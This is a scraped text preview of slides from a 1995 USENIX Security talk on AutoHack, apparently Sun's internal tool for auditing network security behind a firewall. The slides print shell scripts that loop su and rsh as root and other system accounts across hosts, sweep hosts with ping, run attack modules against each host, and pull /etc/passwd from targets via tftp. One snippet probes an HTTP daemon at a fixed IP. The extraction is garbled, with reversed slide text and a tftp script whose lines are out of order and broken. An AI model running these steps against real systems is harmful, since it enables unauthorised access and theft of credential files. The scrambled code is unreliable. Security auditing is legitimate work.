WAN HACKING with AutoHack - auditing security behind the firewall - - PowerPoint PPT Presentation

wan hacking with autohack auditing security behind the
SMART_READER_LITE
LIVE PREVIEW

WAN HACKING with AutoHack - auditing security behind the firewall - - PowerPoint PPT Presentation

WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium 95 WAN HACKING with AutoHack - auditing security behind the firewall Alec Muffett Network Security Group Sun Microsystems Alec.Muffett@UK.Sun.COM alec@hicom.org


slide-1
SLIDE 1

WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95

WAN HACKING with AutoHack

  • auditing security behind the firewall

Alec Muffett Network Security Group Sun Microsystems

Alec.Muffett@UK.Sun.COM alec@hicom.org

slide-2
SLIDE 2

3000 30,000 1,200 6 Security People Subnets Hosts lines of perl/sh

WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95

slide-3
SLIDE 3

#!/bin/sh while read host do for user in root daemon bin sys smtp adm do su $user -c "rsh -n $host ’echo $host-$user’" done done

AutoHack v0.1

WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95

slide-4
SLIDE 4

WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95

A simple version of "testaddr"

#!/bin/sh while read host do ping $host 1 >/dev/null 2>&1 || continue echo $host done

slide-5
SLIDE 5

#!/bin/sh while read host do bin=database/$host test -d $bin || mkdir $bin || exit 1 for module in modules/attack.* do log=‘basename $module‘ $module $host > $bin/$log done done WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95

A simple version of "engine"

slide-6
SLIDE 6

WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95

A simple version of "attack.tftp"

#!/bin/sh host=$1 tf=/tmp/tftpw$$ connect $host mode binary rexmt 15 get /etc/passwd $tf quit EOT test -s $tf && cat $tf rm -f $tf timeout 60 tftp <<EOT >/dev/null 2>&1 timeout 30

slide-7
SLIDE 7

b) HackReport

Overview of AutoHack v5.8

WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95

genaddr mux (background) a) AutoHack attack module attack module attack module genaddr sortaddr uniqaddr avoidaddr sortaddr uniqaddr reportaddr report.writer report testaddr testaddr testaddr engine engine engine database

slide-8
SLIDE 8

FRAMEWORK A IS NEED YOU ALL

WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95

slide-9
SLIDE 9

Banter code for probing HTTP daemons

library lib.banter tcp 123.69.42.7:80 # send an illegal command, log response psend BOING call flush_input quit # http probe

WAN-Hacking with AutoHack - Alec Muffett, USENIX Security Symposium ’95